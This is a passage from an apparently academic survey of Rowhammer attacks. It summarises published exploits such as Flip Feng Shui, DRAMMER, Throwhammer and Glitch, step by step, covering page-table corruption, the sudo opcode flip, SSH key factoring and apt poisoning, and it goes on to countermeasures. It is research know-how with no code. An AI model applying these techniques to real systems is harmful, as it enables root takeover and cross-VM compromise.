63 the KSM9 and the Rowhammer bug to bit flips at RSA public keys compromising authentication and update system of a co-hosted victim VM.  Memory Template: Firstly, they fingerprint the hardware bit-flip patterns on the running system and determining which physical pages and offsets have vulnerable bit flips. They rely on a double-side Rowhammer implementation of [45]. The usefulness of a template depends on the direction of the bit flip, the page offset and the contents of the target victim.  Memory Massaging: First of all, the attacker needs to predict the contains of the VM’s victim page that wants to control and then create a memory page with the same contents and places it at the vulnerable location. Then, it is necessary to wait for the memory deduplication system to scan both pages returning one of the two back to the system and using the other physical page to back both the attacker and the victim’s virtual pages. KSM scans the memory of the VM’s in the order that they have been registered then to guarantee that the physical pages used at the merge are the attacker ones, the attacker VM should have been started before the victim VM. Note that KSM keeps two read-back trees, termed stable and unstable, to keep track of the merged and candidate pages respectively. This limited the attacker, just one template can be used to induce a flip bit. During the copy-on-write event, the victim´s page remains in the stable tree and the subsequent attempts of memory massaging will result in the victim page to control the location physical memory.

Figure 30 Memory deduplication for control over physical memory layout. Figure in [42]

 Trigger Rowhammer: They trigger double side row hammer using Transparent Huge Pages (4.1.3)  System Abusing: The exploitation surface depends on the ability of the attacker to reach interesting locations. An attacker running on a cloud VM can corrupt sensitive file contents in the page cache of a co-hosted victim VM in absence of any software vulnerabilities. o Can duplicate the public RSA key of a victim, then a flip bit on it could provide the attacker with the ability to factorize the key and break the authentication system.

9 The Kernel Same Page Merging (KSM) has been merging to implement memory deduplication in Linux kernel since the version 2.6.32 in 2009. The KSM was originally intended to run more virtual machines on one host by sharing memory between processes as well as virtual machines.

64

o Can flipping the source.list and trusted.gpg apt. The source.list file is used from Ubuntu to operate the daily updates and the trusted.gpg file to check the authenticity of the updates via RSA. If the attacker achieves to compromise the apt, the attacker will be able to store arbitrary attacker generated packages when the victim VM will download the files.

4.3.2.3 MMU Paravirtualization The One bit Flip, one Cloud Flop [55] leverage the Xen MMU Paravirtualization10 to perform from VM guest a deterministic rowhammer exploitation to gain arbitrary access to memory on the host machine. This approach brakes Xen paravirtualization memory isolation and compromises the integrity and confidentiality of co-located VMs or even the VMM (Virtual Memory Manager). The guest VM use hypercalls to map page directories in the OS kernel to physical pages that contain vulnerable memory cells. The steps of the implementation for the Page Table Replacement attack are:  Memory Template: They allocate a large chunk of memory and search for location prone to flipping. Also, they must check if the specific flip bit can be exploitable, in this case, is exploitable if fall into the right spot in a Page Directory Entry (PDE) which makes the PDE points to a different Page Table. The vulnerable page is called Pv.  Memory Massaging: First of all, the attacker VM allocate and map one virtual memory page p. Two physical pages (p1, p2) at the guest kernel space are selected which physical addresses differ just on the specific position of the vulnerable. The Page Table of p is copied at p1 (PT). Then, the PMD of p is copied on the vulnerable page Pv (Shadow PMD) and an hypercall from the Xen Hypervisor is issued to update the PUD entry of p to the new PMD (step 3 and 4 in Figure 31). A fake Page Table (forged PT) that points to physical pages outside the attacker VM is placed at the second physical page p2 (step 5 in Figure 31).  Trigger Rowhammer: They cause the bit flip using a deterministic rowhammer attack on the known two neighbouring rows until bit flip is observed. The PDE will be flipped so that it will point to a malicious Page Table. The shadow PMD placed at Pv (the vulnerable page) will flip from pointing to p1 to pointing to p2. (Step 6 in Figure 31)  System Abusing: Now the attacker can access the 511 virtual pages controlled by the same forged Page Table to access physical memory outside his own VM. The attacker can also modify the PTEs in the forged PT without hypercalls because has the write privilege on the specific forged page table. The attack broke memory isolation on Xen Guest VMs.

10 Xen is an open-source type-1 bare-metal hypervisor for x86, which make it possible to run many instances of an operating system or indeed different operating systems in parallel on a single machine (or host). This type of hypervisors run directly on the host´s hardware to control and to manage guest operating systems. The Xen hypervisor introduces an original future, the paravirtualization of the memory management unit (MMU).

65

Figure 31 Page Table replacement attack. Figure in [55]

4.3.2.4 Buddy allocator The Linux Memory Allocator use the Buddy Allocator strategy (2.7) to overpass the external fragmentation and guarantee the possibility of allocating large blocks of contiguous memory. The allocator operates in an expected way serving memory always from the smaller contiguous physical available block that fit. The predictable behaviour of the kernel memory allocation has been exploited on various attacks to massage the memory in diverse ways by forcing the OS to allocate sensitive data at rowhammer vulnerable positions.

4.3.2.4.1 Flip Feng Shui The DRAMMER attack [2] is a deterministic Rowhammer attack for ARM mobile platforms. The Phys Feng Shui technique, introduced from DRAMMER team, exploits the predictable way in which the buddy allocator reuses and partitions memory (2.7). Aims to place the sensitive data, a page table, at the specific vulnerable location by exhaust the memory in a clever way. The buddy allocator serves memory always from the smaller contiguous physical available block that fit. Then, the attacker can exhaust the memory with large chunks and then split the ones that contain the vulnerable page in multiple smaller chunks that can be released individually. Later of release the smaller chunks with the vulnerable page, the spraying of the page table will place at the specific vulnerable small chank a victim page table. A deep theoretical analysis of the attack method and implementation is shown in the following sections (6.4.3). Reliable root exploitation on Android/ARM follows the next steps:  Memory Template: First of all, the probe physical memory is inquired about flip bits. They use DMA Buffer Management API (2.8.1) to access physical uncached contiguous memory from the ION_SYSTEM_CONTIGUOUS heap and double-side rowhammer to trigger the vulnerability. The memory template phase includes research the exploitability of the vulnerable location. On this case, the bits that an attacker can use for the exploitation are

66

determined by the number of flips that have been found in potentials PTEs locations and, their relative location on the contiguous block.  Memory Massaging: The Phys Feng Shui technique, exhausts available memory chunks of different sizes. It drives the physical memory allocation into a state in which it has to start serving memory from reliable predict regions. Then the allocator is forcing to place the sensitive data, a Page Table, at the vulnerable location.  Trigger RowHammer: They trigger a double side rowhammer at the exploitable vulnerable location and flip a bit on the PT that makes a PTE to point another PT or even its shelf.  System Abusing: Now the attacker has write/read access to a PT, then can map different physical pages to scan kernel memory and implement an escalated privileges attack to achieve root access. The RAMpage attack [60] for ARM mobile platform is a modification of the DRAMMER attack to overpass the countermeasure at the last Android versions (4.1.3.3) (4.2.4). The only difference between them lies in the Template memory phase. RAMpage allocates chunks using ION SYSTEM heap with large orders that span at least 3 or more physical rows (at least 256KB). To begin with, the ION’s internal pools are drained. Each subsequent request for large ION chunk will be likely served by buddy allocator directly with physical contiguous memory. Then, the double-side rowhammer can be triggered to find an exploitable page.

4.3.2.4.2 Memory Ambush The Still Hammerable [63] attack propose a new technique called Memory Ambush to locate the hammerable buffers next to the target object without exhausting memory by leveraging the inherent design of Linux Kernel mmap and buddy physical page allocator. The attack uses double- owned video buffers shared between kernel and user process and allocated from the kernel partition so overpass the memory isolation of CATT defence (5.3). First of all, they identify the hammerable buffers that could be useful for the exploit. The useful buffer should be allocated from the kernel partition but can be accessed by an unprivileged user process. In addition, the buffer must be enough large to increase the exploitable possibilities. The buffers are virtual contiguous but physical discontinuous, they can be mapped to any physical page. In their experiments, they use the double-owned video buffer used on Video4Linux [76], which is a device driver that provides API for programs to capture real-time videos on Linux. From now on the steps to implement the attack are explained below.  Non-template memory: The CATT countermeasure (5.3) avoids the possibility of a user process templates the kernel memory. The specific attack just spraying Page Tables and hammer the buffer repeatedly until a bit is flipped in a PTE.  Memory Massaging: The Memory Ambush technique aims to place the video buffers and the page tables next to each other by leveraging the Linux features. Firstly, they exhaust all the small blocks by creating multiple Page Tables in Linux. The gets it by mmap the same file into different parts of the user address space, the buddy allocator allocates 4KB- block for each PT (Step B in Figure 32). They monitoring when the small blocks are

67

exhausted by reading the /proc/buddyinfo file information. Furthermore, they place the double-owned buffer next to the PT since they are expected to share the same target block (Step C in Figure 32). The size of the Target Block should be twice the rowsize to guarantee that occupy two adjacency rows in the DRAM layout (one for the buffer and another one for the PT). If the buffer is smaller than a rowsize, the page tables ought to occupy the rest empty pages of the split target block. They repeat this steep until the desire specified memory threshold is achieved (Step D in Figure 32).

Figure 32 Memory Ambush. Figure in [63]

 Trigger RowHammer: They trigger a single-sided rowhammer attack by selecting a pair of virtual addresses that are on different rows of the same bank. The specific pair address has been resolved on previews steeps by side-channel row-buffer analysis. Besides, they have to verify the exploitability of the flip bit, if it is not exploitable they start again the process from the Memory massage step.  System Abusing: They gain root/kernel privileges by using their write/read access permission on a PT achieved through the attack, to change the uid of the current process to 0.

4.3.3 Memory Waylaying The Another Flip in the Wall attack [43] introduces a novel alternative for memory massaging called memory Waylaying for both Linux and Windows OS. They exploit the fact that page cache pages after being dismissed from DRAM are loaded to a new random physical location. They

68 leverage the prefetch side-channel attack of [64] to detect when data in virtual memory is placed on a specific physical location.  Memory Template: The attacker launches the attack enclave on a host and templates the DRAM for possible bit flips. This is done via one-location hammering and memory allocation via memory-mapped files that avoid out-of-memory situations. The result of this phase is a list of physical vulnerable pages in standard system executable binaries or shared libraries.  Memory Massaging: They use the prefetch-based prediction oracle technique to know when the binary or library page vulnerable target is placed on one of the exploitable memory locations monitoring the set of target addresses during the Memory Waylaying. The Memory Waylaying technique performs replacement-aware page cache eviction using only cache pages. The cache pages, after being discarded from DRAM are loaded to a new random physical location, then trough contiguous eviction the page is eventually placed on a vulnerable physical location. This technique is very difficult to detect from the existent rowhammer countermeasure because does not exhaust memory. Nevertheless, it would need a long time to be completed, around 90 hours in their implementation test.  Trigger RowHammer: They flip the bit predictable in the opcode of the target page using one-location hammering. The attacker can also verify where the bit was flipped by reading the content of the binary page. This phase takes just little seconds to be completed.  System Abusing: Now the binary page in memory contains the modify opcode for sudo that bypass authentication checks. This provides to the attacker with illegitimately obtained root privileges.

4.4 ATTACK INTERFACE The typical way to introduce errors at memory locations without access permissions were Hardware-faults attacks. This Faults attacks 11 typically require physical access to the device to expose it outside of specific physical conditions such as low temperature, radiation, as well as a laser on dismantled microchip causing spurious currents inside the target chip [77]. Currently, the hardware faults are possible induced by software. Software fault-injection techniques are attractive because they do not require expensive hardware, do not need direct access to the device and can be used to target applications and OS, which is difficult to do with hardware-fault injection [77]. Rowhammer can be considered one of these software fault-injection techniques

11 The Fault Analysis (FA) is a class of implementation attacks on the embedded system. It has been taken with a big interest in the last years, starting with analyzing the exploitability of random errors until the more develop attacks that try to induce faults within a cryptographic system. Fault models are often used in a transient fault assumption; a fault is injected during a target computation while other computations remain unaffected. Most fault analysis techniques are differential, which requires a correct and faulty computation with the same inputs in order to exploit the difference of output for key recovery. Countermeasures such as a Random Values Padding technique that restrict multiple encryptions with different input, and Dual Module Redundancy (DMR), that perform redundancy operations follow by comparison for detect faults, can be implemented to be secure against single fault injection.

69 at runtime. The faults are injected as bit-flips to emulate errors as a result of faults. Different kind of clever exploits techniques will be described in this section and summarized in Table 10.

Attack Interface Page Table Escape Shared Browsers RDMA TEE Flipping Corruption Sandbox NaCL Resources network Opcodes GoogleProject0 ✓ ✓ ✓

Non-Temporal RH ✓ Curious case of RH ✓ Dedup Est Machina ✓ Flip Feng Shui ✓ One bit flip, one cloud flop ✓ DRAMMER ✓ SGX-Bomb ✓ ✓

Another Flip in the Wall ✓ Glitch ✓ Trowhammer

RAMPAGE ✓ PFA ✓ Still Hammerable ✓

Table 10 Attack Interface

4.4.1 Page Table Corruption Attacks The attacks at these groups aim to flip a bit in a Page Table user process to win write and read access to all the system memory.  One of the GoogleProject0 [71] (4.3.2.1.1) attacks aims to escalate privileges and achieve access to all the physical memory. It aims to flip a bit on one of the spraying Page Table Entry to point with write access at a Page Table location. Then, the process can modify a page table and winds up access to all physical memory.  DRAMMER [2] and RAMpage [60] exploit a flip bit in a Page Table Entry in order to wind access to all physical memory location. Instead of spraying Page Tables all over the memory they trick the memory controller to place the Page Table at the chosen vulnerable location.  Also, the Still Hammerable attack [63] exploits the Page Table corruption technique for gain root/kernel privilege from a user process.

4.4.2 Escape Sandbox Native Client Restrictions  One of the exploits introduced at GoogleProject0 [71] proposes to induce the flip bits directly at the assembly instructions with the target of scape the security restriction of

70

the Sandbox platform for run Native code (C/C++) (4.3.2.1.2). They overpass the restriction level instruction policy of the platform. This policy ensures the native code executes just within its own code, access just its own data, and communicate with the browser just with predefined interfaces. The target is using rowhammer to flip bits at the native instruction to make a jump at non-bundle-aligned address memory. Then the process could access memory out of their reserve dynamic code area.  A new approach to scape sandbox was presented at Non-Temporal [47]. They use non- temporal instructions instead of clflush and need to massage the memory in a specific way (4.3.2.1.3) to trigger the flip bit in the native code.  The Glitch Attack [58] [78] compromises the JavaScript Sandbox of the Firefox browser by achieving read/write permissions on any mapped region of the process virtual space. This provides to the attacker with the ability to executing code remotely by overwriting a method pointer of a JavaScript object.

4.4.3 Attacks Across Shared Resources  The attack One-bit Flip one Cloud Flop [55] is implemented in a kernel module of the Linux OS that runs on Xen guest VMs to break Xen paravirtualization memory isolation by using a Replace Page Table. The attacker replaces one of his own page tables with a forged one and maps 512 of his virtual pages to 512 victim physical pages.  The Flip Feng Shui attack [42] provides to a malicious VM guest in a practical cloud setting with the ability to gain unauthorized access to a co-hosted victim VM. It compromises the OpenSSH by exploiting the memory deduplication feature.  The Curious case of Rowhammer [54] proposes a methodology that uses timing (Prime+Probe attack) (APPENDIX 1: Side Channel Attacks) analysis to find out the place that stores the cryptographic keys in the memory. They use a row-buffer collision time analysis to induce faults in a 1024 bits RSA12 key on cross-VM environments.  The FPA [61] aims to use rowhammer to induce a persistent fault on the Libencrypt1.6.3 cryptographic library shared on a server with shared library settings. The target is to find the master key of AES-12 13 by overpassing the typical countermeasure implemented to avoiding Fault Injection attacks.

4.4.4 Javascript Based Remote Attack from Browsers  The Rowhammer.js [3] presents a remote Software-induced Hardware-Fault attack based on their own rowhammer implementation that is independent of the instruction set of the CPU. They implemented in JavaScript, in Firefox 39, because is a scripting

12 The RSA is a public key cryptosystem and is widely used for secure data transmission and solves the key distribution problem that is inherent to symmetric encryption and it is also used for generating digital signatures, which can provide authenticity and non-repudiation of messages. The RSA relies on the assumption that it is computationally infeasible to derive the private key from the public key. 13 AES is a symmetric block cipher, which is a method of encrypting text in which a cryptographic key and algorithm are applied to a block of data at once rather that one bit at a time. Include three possible block ciphers: AES-128, AES-192, and AES-256.

71

language that is used in all modern browsers to create interactive elements on websites. The main challenges to perform this attack are two. First of all, to find optimal eviction strategy as a replacement from the flush instruction. Secondly to be able to find address pairs efficiently because JavaScript has no concept of virtual address or pointers (4.2.2.1). They use the double-side rowhammer from [71] and propose their own adaptive eviction strategies. In their empiric researches, they find that the probability for bit flips in JavaScript and in native code is almost the same for different refresh intervals. They presume that any machine vulnerable to the native code could be also vulnerable to the JavaScript remote attack. Whatever the Iby Bridge Laptop is the only one that they prove to have enough flip bits without clflush in default settings. Notice that this is not an end- to-end attack but just a way to trigger rowhammer vulnerability remotely. Also, for success, it is necessary the use of Huge Page with is not a feature active by default.  The Dedup Est Machina [46] team present an end-to-end JavaScript-based attack against the Microsoft edge browser, running on Windows 10, in absence of software bags and with all defends turn on. They combine their deduplication-based primitives (4.3.2.2.1) with a reliable rowhammer exploit to gain arbitrary memory read and write access in the browser. They find the cache eviction sets and use reduction algorithms similar to [3] in order to find minimal eviction set. Then, they use single-side rowhammer to pivot from a reference to a valid target object to a counterfeit object, resulting in arbitrary memory read/write access capabilities in Microsoft Edge.

4.4.5 Remote Attack On Fast RDMA-Enable Networks  The Throwhammer [59] attack can trigger and exploit rowhammer bit flips directly from a remote machine by sending network packets. The RDMA-enable networks of at list 10Gbps provide the attacker with the opportunity of access directly DRAM fast enough to trigger the vulnerability. They propose an end-to-end exploit against RDMA-Memcached key-value stored. The arbitrary write primitive achieved can be used to redirect the control flow and achieve code execution.

4.4.6 Trust Execution Environments (Tee) The attacks under this section exploit specific features that enable secure computation. Specifically, target the Intel Software Guard Extension (SGX) that is a commodity hardware- based TEE implementation designed to have a small trusted computing base. The drop-and-lock policy implemented at SGX is based on the assumption that the violation of memory integrity can be induced by hardware attacks only. The rowhammer introduces a new threat by undermining the integrity of an enclave by triggering software the vulnerability in the memory hardware. Due to the drop-and-lock policy is still applied in this case, the software-only rowhammer attack can halting the processor without physical access to the DRAM. DoS attacks (4.5.4) that allow a remote client to lock the server have been proposed at SGX-Bomb [56] and Another Flip in the Wall attack [43] because of the memory modification trough disturbance error is not reflected in the integrity tree.

72

4.4.7 Flipping Opcodes The attacks under this category identify potential target bit flips on binary opcodes by manually looking for devastating outcomes such as obtain root permission without knowing the root password. And they exploit them via rowhammer.  One of the GoogleProject0 [45] [71] attack aims to flip bits at the Native Cl sandbox code. They overpass the NaCl protection policies by flip bits at the native instructions that will allow access memory at non-aligned addresses.  The Another Flip in the Wall attack [43] describes a generic technique for exploiting bit flips in cache copies of binary files with the aim of mount a privilege escalation attack in an SGX cloud. Notice that the bit flips in opcode yields set valid opcodes in most cases for x86 instructions. For example, they exploit the opcode flipping on sudo binary and sudoers.so shared library for privilege escalation. On this case, they find out that there are 29 different flip bit position offsets in the binary sudo instruction that breaks the password verification logic. All of them affect the condition jump on the password verification location in a way that the condition changes by treating an incorrect password as if it was correct.

4.5 ATTACK TARGET Under this section, we categorize the different targets that have aimed until now the rowhammer attacks. The specific targets affect the design of the attack methodologies since different kinds of targets required different techniques to exploit the corrupted bit (Table 11). Attack Target System Remote System Confidential Integrity DoS Privilege privilege Attacks Attacks Escalation escalation GoogleProject0 ✓ Non-Temporal RH Curious case of RH ✓ Dedup Est Machina ✓ Flip Feng Shui ✓ ✓ One bit flip, one cloud flop ✓ ✓ DRAMMER ✓ SGX-Bomb ✓ Another Flip in the Wall ✓ ✓ Glitch ✓ Trowhammer ✓ RAMPAGE PFA ✓ Still Hammerable ✓ Table 11 Attack Target

73

4.5.1 System Privilege Escalation System security is based on the differentiation between a process that runs with system permission and unprivileged user mode process. The user process is not able to access sensitive data without permissions. The system privilege escalation attacks are local rowhammer attacks that aim to breaks this security mechanism by corrupt from unprivileged process privilege memory locations. They exploit the memory corruption to achieve write and read primitives on all the system. All the attacks under this category rely on run a malicious process with user primitive local at the system.  GoogleProject0 [71] presents a Page Table Entries based exploit that uses the Rowhammer induced bit flip to achieve write/read access out of the physical memory of the process. They use the Page Table Data Spraying (4.3.2.1.1) technique to modify the page table and get access to any page physical memory. The broken of the memory process isolation provide to a Linux process with the ability to escalate privilege and gain access to all physical memory. From then on they have many ways to exploit it, some of their proposals are: o Make a shell code to run as root by modifying a SUID-root executable in such a way that the /bin/ping file points to the own shellcode. This approach is fast and portable but requires access to the pagemap file. o A related option modifies a library that a SUID executable use, such as /lib64/ld- linux-x86-64.so.2. o Less portable approach modify kernel code such as kernel’s syscall handling code or kernel data structures such as the process’s UID field.  The DRAMMER [2] and RAMpage [60] paper present a system privilege escalation attack for Android OS. They aim to flip bits at one of their Page Table Entry in a way that will point another, or the Page Table itself. This provides to the attacker with write permissions at the specific Page Table. The attacker achieves control on one of their own page tables, enabling root privilege escalation. To complete their android root exploitation, they overwrite the controlled page table to probe kernel memory looking for their own struct cred. The struct cred structure represents the security concepts and holds of the process by specifying the process credentials and saving users and groups IDs (6 different ones). Android provides to each app with a unique ID, in order to fingerprint the security context is necessary to compare 24(6 × 4) bytes by using memcmp() with takes around of 600ns. In their experiments, they find out that the physical page that stores the specific struct cred is always aligned to the boundary of 128 bytes and is 4096 placed between 0x30000000 and 0x38000000. Then 32 ( ) possible locations within a 128 page and 220 different physical pages must bein checked in the worst case which means 220 × 32 = 33.554.432 calls to memcmp(). An attacker control just a single page table with 512 Page Table Entries, for ARMv7, it is necessary to flush the TLB every 521 entries. On their empirical studies, they achieve to successfully exploit the Nexus 5 in less than 20 seconds. Whatever their worst scenario could take a little over than 15 minutes due to the most time-consuming phase that is the templating.

74

 The Another Flip in the Wall [43] study presents a full attack for a local scenery where the attacker runs the attack on a personal computer and performs privilege escalation attack to abuse unprivileged SGX enclave. It relies on the opcode flipping technique (4.4.7) and the memory waylaying process (4.3.3). They perform their attack successfully at Intel Skyle i7-6700K with DDR4-2133, i5-5230M with DDR3-1600 memory, and an i7-4790 with Kingston DDR3-1600.  The Still Hammerable attack [63] uses the write primitives achieved by the corruption of a user process Page Table to modify the UID field of the process to 0.

4.5.2 Remote System Privilege Escalation All the attacks under this category are trigger remotely and rely on a previous step of louring the victim to a website that employs the malicious Javas Script application by using finish emails or just sending network packets to the target system. Note that the remotes attacks are more constrained and harder to fulfil than the local ones but are much stealthier and its application could be much more extended.  The Dedup Est Machina [46] team presents an end-to-end JavaScript-based attack against the Microsoft edge browser, running on Windows 10, in absence of software bags and with all defends turn on. They gain arbitrary memory read/write access to a heap and by using an incremental disclosure strategy to the entirety Microsoft Edge´s address space.  The Glitch Attack [58] [78] compromises the JavaScript Sandbox of the Firefox browser by achieving read/write permission allowing the attacker to achieve privilege escalation remotely. They trigger the end-to-end compromise between a minimum of 47 seconds to a maximum of 586 seconds.  The Throwhammer [59] attack wins code execution on a remote key-value server application by achieving write primitive out of the DRAM buffer area. The write primitive allows them to corrupt the GOT instruction redirecting the control flow and achieving code execution permission.

4.5.3 Confidential Attacks  The attack One bit Flip one Cloud Flop [55] breaks the confidentiality of a victim that run an Apache web server in which an HTTPS was configured to support SSL/TLS. The attacker conducts the cross-VM rowhammer attack and checks at each bit of the victim memory looking for the beginning of RSA struct. The RSA_check_key() function provided by OpenSSL takes a pointer as an argument and check for the RSA struct by validating the following conditions: p and q are both prime numbers, 푛 = 푝 ∗ 푞 and (푥푒)푑 ≡ 푥 mod 푛 . If the function validates the locations, then is the beginning of an RSA structure and the private key can be extracted. They prove it at a machine equipped with Broadwell i5-5300U processor and 8GB of DRAM but also should work at the other machines that they found exploitable bits such as Sandy-Bridge i3-2120 (4GB), Sandy Bridge i3-2120(4GB), Sandy Bridge i5-2500(8GB).

75

 The Flip Feng Shui attack surface [42] proves their strategy by overpass the RSA authentication mechanism of the OpenSSH daemon. Firstly, the attacker forces OpenSSH to read the authorized_keys file and copy into the cache by initiate an SSH connection to the victim with an arbitrary private key. Now with the victim public key at the cache, the flip bit is triggered on the modules n in a way that (푛,, 푒) key can be factorized with big probability. Then they flip bits according to the template to obtain corrupted keys and keeping them at the corrupted file (푛,, 푒). Each 푛, candidate is factorized using the ECM algorithm14 . For all the successful factorizations the exponent 푑, corresponding to (푛,, 푒) is calculated. The analogous private key to the corrupted public key (푛,, 푑,) is generated by using the PyCrypto RSA cryptographic library [79] and can be used to login to the victim VM using an unmodified OpenSSH client. The flip bit will likely produce a 푛, that is not the product of two primes of almost equal size which is easier to factorizing than n.  The Curious case of Rowhammer [54] paper induces a flip bit on the secret exponent bit, by running a code that hammers random rows at the specific bank where the secret is kept until the decryption output changes. The bit flip introduced in the secret exponent can successfully reveal the secret by applying faulty signature techniques. A single faulty signature is enough to retrieve the secret.  The PFA [61] attack recovers the secret key of AES-128 implementation using the Permanent Fault Analysis technique. The persist fault injection is triggered within the rowhammer T-Table that is the look-up table used at the Substitution stage of AES-128 which is stored at the memory. The PFA technique to extract the AES-128 master has been proved against the Libcrypt 1.6.3, which is an open source cryptographic library which provides numerous cryptographic building blocks.  The attack One-bit Flip one Cloud Flop [55] exploits rowhammer to log in an OpenSSH server without a password. The adversary search for a place of the binary code of sshd-, a code snippet in the sshpam_auth_passwd() function. The attacker can inject code at the target memory to change the code as shown in Figure 33. The modify code replaces the pam_authentication(), that returns 0 in register %eax successful authentication, with code that assigned %eax to 0 directly, so the authentication will be bypass.

14 The Elliptic Curve Factorization Method (ECM) can quickly find factors up to 60 or 128 bits. It is a generalization of Pollard´s ρ-1, which efficiently find any prime factor p of a composite integer n for which p-1 is smooth using a multiplicative group. It is replaced by the group of points on a random elliptic curve [113]. The running time of ECM depends on the size of the prime factors of n, then the algorithm tends to find small such factors first. In the hardest case, when n is a product of two primes of roughly the same size the ECM is not as efficient as the Quadratic Sieve Factoring, which selects and test polynomials for the factorizing.

76

Figure 33 Pseudo code to illustrate attacks against the OpenSSH server. On the left is the original code and on the right the code after the flip bit

 A second attack based on Flip Feng Shui [42] is presented. They subvert the GNU Privacy Guard, which is a security application that verifies software distributions by verifying signatures using trusted public keys. In particular, the apt package distribution system of Ubuntu is targeted. First, it steers the victim to the malicious repository by inducing a bit flip in the source.list that holds the URL of the repositories using for package installation and update. Then similar to the OpenSSH attack, they apply bit-flip mutation to create corrupt RSA key module that can be factorized. The private key can be exported using PyCrypto RSA cryptographic library [79] and converted to GPG format by using pem2openpgp [80]. The malicious package can be signed with the new private key and the victim will download and install the new package without warning.

4.5.4 DoS Attacks The DoS (Denial-of-service) attacks is a cyber-attack in which the attacker makes a machine or network resource unavailable to its intended users. This kind of attack is typically accomplished by flooding the targeted resource with a superfluous legitimate request to overload the systems. Much cleverer and difficult to detect is the DoS that aims to exploit specific features of the resource to make it block its self. The rowhammer introduces the possibility to lock the processor launching a DoS attack that intentionally triggers the defence mechanism of the MEE of SGX for physical attacks on memory integrity. One of the attacks present at Another Flip in the Wall [43] and the SGX-Bomb [56] aim to abuse the Intel SGX (Error! Reference source not found.) in a cloud scenery to trigger a deny-of-services a ttack that will take the server down. The attacker launches the attack enclaves on many hosts and tries likely also trigger vulnerable flips bit in the EPC (Encrypted Memory Area) memory region used by SGX. The CPUs with SGX enable will shut down every machine with corrupted memory at the EPC region to guarantee confidentiality until be manually rebooting which could make the cloud not be able to provide a service.

77

5 RH COUNTERMEASURES

The aforementioned attacks demonstrate the severity of the rowhammer vulnerability and have pushed the researches to propose countermeasures that can defend the systems against it. The most common belief is that the rowhammer vulnerability cannot be totally fixed by means of software updates, requires production and deployment of redesign DRAM modules taking account the HW-based solutions. Hence the existence of legacy systems will remain vulnerable for many years many different SW-based mitigations have been proposed to increase the difficulty to conduct the attack.

5.1 DISABLE UNDER ATTACK FUNCTIONALITIES The simplest countermeasure that can be applied is to remove or disable if it is possible, the rowhammer depending mechanisms preventing the exploitability and even the triggering of the vulnerability.

 Instructions blacklisting Disallowing or rewriting instructions such as CLFLUSH and non-temporal instruction has been proposed as a countermeasure and is now deployed in Google Native Client. This countermeasure disables the GoogleProject0 [45] and the Non-Temporal [47] attacks respectively on NaCl.

 Prohibited pagemap access from userland The access to the Linux pagemap interfaces has been prohibited from userland as one of the first countermeasures against the rowhammer attacks that are based on learning which rows are at the same bank through the access to the specific kernel file. Since Linux 4.0, the version relies upon early 2015, this information can be access just from privilege users in order to hide it to possible rowhammer exploitation [67] [68]. This countermeasure disables the possibility of attacks Linux from 4.0 version trough the GoogleProject0 [45], Non-Temporal [47], Curious Case of RH [54], and PFA [61] attacks.

 Disable Memory Deduplication and MMU Paravirtualization Attacks such as Dedup Est Machina [46], Flip Feng Shui [42] and One bit flip, one cloud flop [55] utilize special mechanism, like memory deduplication or MMU paravirtualization to induce the OS to replace the victim object with a forged object, which is counterfeit by the attacker and has the same content with the victim. These techniques are not universally applicable for all situation, just for a system that has enabled the specific dependent mechanism. Then, a successful way to prevent them is just removing or disabling their depending mechanisms.

 Disable Contiguous heap Google first reaction to DRAMMER [2] attack disabled the kmalloc heap from user space, removing an attacker’s primitive to allocate contiguous memory. They first introduce the countermeasure on their security update for Android at November 2016 disabling the possibility to attack with DRAMMER [2] the latest build Android version. The RAMPage [60] attack was

78 proposed it to overpass the specific countermeasure; they modify DRAMMER attack to can be triggered using the regular system heap that not guarantee the allocation of contiguous memory.

 Pool Size Reduction Google at their second round of countermeasures for DRAMMER mitigation reduces the number of memory pools sizes that can be accessed from the user. By reducing the maximum pool size to 64KB, the attacker is more likely to obtain fragmented memory pieces that are not physically contiguous.

5.2 HARDWARE-BASED SOLUTIONS The most effective defence is to replace the DRAM vulnerable module with new memory chips that do not suffer from rowhammer vulnerability. Beside of that has been discussed at [1] various aspects that could be improved on Hardware settings level with the aim of eliminating the possibility of trigger the vulnerability at a vulnerable DRAM. Some of the techniques, such as ECC and TTR, requires the production of new memory chips, while others require just changes on the Memory Controller.

 Double DRAM Refresh Rate The rowhammer technique requires to access adjacent rows enough times in the refresh interval (3.1), one proposal is to double the DRAM refresh rate so the hammering frequency is not enough for inducing bit flips. The DDR standard specifies that rows should be refreshed at least every 64ms, then the countermeasure proposes to refresh the row at least every 32ms. This has been applied from most of the hardware vendors via EFI or BIOS updates [81] [82] [83]. The specific defence apart of incurring a high-performance penalty has also been shown ineffective in attacks such as ANVIL [49] and Good go Bad [53].

 Error-Correction Code (ECC) Memory The ECC RAM can detect and correct 1-bit errors and deal with rowhammer just on the case of a single flip bit. Nowadays Intel mainly deployed ECC RAM for servers, and normally it is not supported at desktops and laptops. Only AMD Ryzen processors support ECC RAM in commodity systems. Furthermore, IBM’s Chipkill error correction could successfully recover 3-bit error but still, uncorrectable multi-bit flips can be exploitable and result on DoS attacks such as the one show at Another flip on the Wall [43].

 Target Row Refresh (TTR) The TTR refreshes adjacent rows if the targeted row is accessed at a high frequency. Rely on Maximum Activation Count (CAT) mechanism that keeps track of the number of activations to each row. When the number of activations for one row is equal to the row hammering threshold, the victim rows associated with the access ones get refreshes. A specific mechanism has been proposed at [35]. The new LPDDR4 standard includes the adoption of TTR and CAT as an optional protection mechanism, leaving the chip still vulnerable to Rowhammer by default.

79

 PARA (Probabilistic Adjacent Row Activation) The PARA mechanism probabilistically activates rows adjacent to a potential victim and rely on the Detection of activation patterns which need support from the DRAM chip or the memory controller. As enhanced from PARA, the Probabilistic Row Activation (PAR) mechanism has been presented [35]. It simply allows Memory Controller to probabilistic open adjacent and non- adjacent rows and expect to refresh vulnerable rows before bit flip occurs. This mechanism could mitigate rowhammer attacks with less performance penalty but until now has not further verification.

 ARMOR The main challenge to mitigate by Hardware based countermeasure the rowhammer effect is to monitor the number of activations for each row in the DRAM which imposing a significant storage overhead to the memory system. ARMOR [84] is a run-time memory hot-row detector that monitors the activation of rows at the memory interface level. It detects the rows under risk at run-time with minimal storage overhead. Also, introduces a cache Buffer solution for the rows that detected to have frequent activation. The frequent rows are served outside the DRAM module prevented to be hammered.

5.3 SOFTWARE-BASED MITIGATIONS The Software-based mitigations try to prevent the attack by preventing any of the attack process primitives describe at before sections (4). By blocking a primitive the attack will not work because will could not achieve the intended implication. The Software-based defences go into different classes depending on the assumptions and properties of each form of protection. The categorization is similar to the ones proposed at [43].

